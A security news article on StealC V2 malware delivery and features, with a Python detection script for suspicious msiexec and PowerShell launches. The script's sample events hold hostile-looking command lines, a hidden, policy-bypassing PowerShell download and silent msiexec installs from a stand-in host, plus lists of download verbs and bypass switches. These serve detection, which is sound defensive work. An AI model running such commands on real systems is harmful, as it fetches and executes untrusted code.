StealC, an information stealer and malware downloader, has received upgrades that substantially expand its attack surface and effectiveness.
The malware, which has been actively sold on underground forums since January 2023, rolled out its version 2 (V2) in March 2025 with sophisticated enhancements.
According to a recent report from Zscaler, StealC V2 now leverages Microsoft Software Installer (MSI) packages and PowerShell scripts as delivery mechanisms, moving beyond traditional executable files.
The MSI packages are deployed silently through msiexec.exe with built-in retry functionality, while PowerShell scripts execute remotely without retries; both approaches are designed to evade detection.
Among the most significant enhancements is StealC V2’s redesigned control panel featuring an integrated builder that allows threat actors to customize payload delivery based on specific parameters:
- Geographic location of the victim
- Hardware identification numbers (HWID)
- Software installed on the target system
The malware has undergone substantial technical refinement, including:
- Implementation of RC4 encryption in recent variants (after version 2.1.1)
- A streamlined JSON-based command-and-control communication protocol
- Multi-monitor screenshot capture capability
- Server-side brute-forcing for credentials
- Unified file grabber targeting crypto wallets, gaming applications, VPNs, email clients, and browsers
StealC V2 has been compiled specifically for 64-bit architectures and supports Chrome v20 application-bound encryption, demonstrating its adaptation to modern computing environments.
Meanwhile, it has abandoned certain features from its predecessor, including anti-VM checks and third-party DLL downloads.
Perhaps most concerning to security professionals is evidence of StealC’s professional development cycle. The malware is typically protected using Themida for obfuscation and employs a two-stage deobfuscation process for strings.
Its development team delivers regular updates via ZIP archives containing builder templates and version configurations.
The control panel now includes Telegram bot integration for notifications, allowing attackers to receive real-time alerts when valuable data is exfiltrated.
Rule-based payload delivery can trigger specific loaders when markers like “coinbase.com” appear in stolen data, indicating a highly targeted approach to financial information theft.
Security experts recommend organizations take the following protective measures:
- Implement application allowlisting to prevent unauthorized MSI packages from executing
- Enable PowerShell script block logging and constrained language mode
- Deploy advanced endpoint detection and response (EDR) solutions with behavioral analysis
- Conduct regular security awareness training focusing on social engineering tactics used to deliver initial infection
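The two delivery paths described above (a silent msiexec.exe install with retries, and remotely executed PowerShell) and the logging recommendations just listed can be tied together in a small triage script. The following is an added example and is not code from the article or from Zscaler's report: it scans process-creation events for a quiet msiexec install sourced from a URL, for PowerShell invocations that fetch a remote script with hardening-bypass switches, and for bursts of repeated msiexec launches that would be consistent with built-in retry logic. The event field names, the thresholds, the switch and flag lists, and the sample events are all assumptions constructed for this illustration; map them onto your own EDR or Sysmon export.

```python
"""Triage of process-creation events for the StealC V2 delivery patterns
described in the article. Added example; field names, heuristics and sample
events are constructed assumptions, not indicators from the Zscaler report."""
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Heuristics (assumptions for this example, not indicators from the article).
MSI_QUIET_FLAGS = {"q", "qn", "qb", "quiet", "passive"}   # msiexec UI-suppressing switches
PS_NOTABLE_SWITCHES = {"-ep", "-executionpolicy", "-w", "-windowstyle", "-nop", "-noprofile",
                       "-e", "-ec", "-enc", "-encodedcommand", "-noni", "-noninteractive"}
PS_FETCH_ALIASES = ("iwr", "irm")
PS_FETCH_VERBS = ("invoke-webrequest", "invoke-restmethod", "downloadstring",
                  "downloadfile", "start-bitstransfer")
URL_RE = re.compile(r"https?://\S+", re.IGNORECASE)
RETRY_WINDOW = timedelta(seconds=60)   # assumed window for a retry burst
RETRY_THRESHOLD = 3                    # assumed number of launches that counts as a burst


def _tokens(cmdline: str) -> list[str]:
    """Lower-cased whitespace tokens with surrounding quotes removed."""
    return [t.strip('"\'').lower() for t in cmdline.split()]


def classify(event: dict) -> list[str]:
    """Return finding tags for one process-creation event (empty when nothing is notable)."""
    image = event["image"].lower().rsplit("\\", 1)[-1]
    cmd = event["command_line"]
    toks = _tokens(cmd)
    remote = bool(URL_RE.search(cmd))
    findings: list[str] = []
    if image == "msiexec.exe":
        # Both "/qn" and "-qn" spellings are accepted by msiexec, so strip either prefix.
        quiet = any(t.lstrip("/-") in MSI_QUIET_FLAGS for t in toks)
        if quiet and remote:
            findings.append("msiexec:silent-install-from-url")
        elif quiet:
            findings.append("msiexec:silent-install")
    elif image in ("powershell.exe", "pwsh.exe"):
        switches = sorted({t for t in toks if t in PS_NOTABLE_SWITCHES})
        fetch = any(a in toks for a in PS_FETCH_ALIASES) or any(v in cmd.lower() for v in PS_FETCH_VERBS)
        if remote and (fetch or switches):
            findings.append("powershell:remote-script-fetch")
        if switches:
            findings.append("powershell:notable-switches:" + ",".join(switches))
    return findings


def retry_bursts(events: list[dict]) -> list[tuple[str, str, int]]:
    """Report (host, package, count) where the same msiexec package was launched by the
    same parent at least RETRY_THRESHOLD times inside RETRY_WINDOW."""
    buckets: dict[tuple, list[datetime]] = defaultdict(list)
    for ev in events:
        if ev["image"].lower().endswith("msiexec.exe"):
            m = URL_RE.search(ev["command_line"])
            pkg = m.group(0) if m else "<local>"
            buckets[(ev["host"], ev["parent_pid"], pkg)].append(datetime.fromisoformat(ev["ts"]))
    out = []
    for (host, _parent, pkg), times in buckets.items():
        times.sort()
        for i in range(len(times)):          # sliding window over sorted launch times
            j = i
            while j + 1 < len(times) and times[j + 1] - times[i] <= RETRY_WINDOW:
                j += 1
            if j - i + 1 >= RETRY_THRESHOLD:
                out.append((host, pkg, j - i + 1))
                break
    return out


# Constructed sample events (hosts, PIDs, URLs and timestamps are made up for this example).
SAMPLE_EVENTS = [
    {"ts": "2025-03-10T09:00:01", "host": "ws01", "parent_pid": 4120,
     "image": r"C:\Windows\System32\msiexec.exe",
     "command_line": "msiexec.exe /i https://cdn.example.invalid/setup.msi /qn"},
    {"ts": "2025-03-10T09:00:12", "host": "ws01", "parent_pid": 4120,
     "image": r"C:\Windows\System32\msiexec.exe",
     "command_line": "msiexec.exe /i https://cdn.example.invalid/setup.msi /qn"},
    {"ts": "2025-03-10T09:00:25", "host": "ws01", "parent_pid": 4120,
     "image": r"C:\Windows\System32\msiexec.exe",
     "command_line": "msiexec.exe /i https://cdn.example.invalid/setup.msi /qn"},
    {"ts": "2025-03-10T09:05:40", "host": "ws02", "parent_pid": 5016,
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "command_line": 'powershell.exe -NoProfile -WindowStyle Hidden -ExecutionPolicy Bypass '
                     '-Command "iwr https://cdn.example.invalid/update.ps1"'},
    {"ts": "2025-03-10T10:15:00", "host": "ws03", "parent_pid": 2200,
     "image": r"C:\Windows\System32\msiexec.exe",
     "command_line": r'msiexec.exe /i "C:\Users\alice\Downloads\7zip.msi"'},   # interactive, local
    {"ts": "2025-03-10T10:20:00", "host": "ws03", "parent_pid": 2200,
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "command_line": "powershell.exe -Command Get-Process"},                      # benign
]


def triage(events: list[dict] = SAMPLE_EVENTS) -> dict:
    """Run both checks and return per-event findings plus any retry bursts."""
    return {"per_event": [(ev["host"], classify(ev)) for ev in events],
            "retry_bursts": retry_bursts(events)}


if __name__ == "__main__":
    for host, tags in triage()["per_event"]:
        print(host, tags or "-")
    print("retry bursts:", triage()["retry_bursts"])
```

The script deliberately keeps a quiet local msiexec install as a low-priority tag rather than an alert, since that is normal software deployment; the combination of a quiet flag with a URL source, or repeated launches of the same package within a short window, is what stands out against the behaviour the article describes. Script block logging (Event ID 4104) gives you the content of the fetched PowerShell script itself, which this command-line-only check cannot see.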
For technical indicators of compromise and detection methods, organizations are encouraged to consult the detailed analysis published by Zscaler’s ThreatLabz.